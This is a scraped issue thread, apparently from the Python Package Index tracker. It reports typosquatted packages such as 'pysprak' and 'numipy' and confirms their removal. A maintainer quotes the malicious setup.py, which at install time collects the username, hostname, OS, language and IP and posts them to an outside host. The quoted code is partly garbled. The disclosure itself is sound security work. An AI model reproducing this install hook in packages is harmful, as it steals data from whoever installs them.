Those projects will steal user information when some one use pip to install them:
pysprak
libhtml5
libcurl
python-mysql
mateplotlib
numipy
openvc
zt2
All 4 comments
thanks for report @zt2, please consider submitting via our published security policy in the future...
reviewing now.
ewdurbin
on 11 May 2018
The following packages were removed under our typosquatting policy and the user was destroyed.
libhtml5
mateplotlib
nmap-python
numipy
openvc
pysprak
python-mongo
python-mysql
python-openssl
PyYMAL
The malicious setup.py contents for all packages that were removed:
def checkVersion():
user_name = getpass.getuser()
hostname = socket.gethostname()
os_version = platform.platform()
if platform.system() is 'Windows':
import ctypes
import locale
dll_handle = ctypes.windll.kernel32
loc_lang = locale.getdefaultlocale()
language = ':'.join(loc_lang)
elif platform.system() is 'Linux':
loc_lang = os.popen("echo $LANG")
language = loc_lang.rea
ip = [(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]
package='pysprak'
vid = user_name+"###"+hostname+"###"+os_version+"###"+ip+"###"+package
if sys.version_info>(3,0):
request.urlopen(r'http://numipy.openvc.org/spark.php',data='vid='.encode('utf-8')+base64.b64encode(vid.encode('utf-8')))
elif sys.version_info<(3,0):
urllib.urlopen(r'http://numipy.openvc.org/spark.php','vid='+base64.encodestring(vid))
checkVersion()
@ewdurbin Maybe an issue template named "security/malware report", whose contents tell the user to submit according to policy instead, would be helpful?
pradyunsg
on 11 May 2018
👍3
Was this page helpful?
0 / 5 - 0 ratings
Related issues
mahmoud
路
4Comments
ruohoruotsi
路
3Comments
mbakke
路
3Comments
ewjoachim
路
3Comments
nlhkabu
路
4Comments
Most helpful comment
@ewdurbin Maybe an issue template named "security/malware report", whose contents tell the user to submit according to policy instead, would be helpful?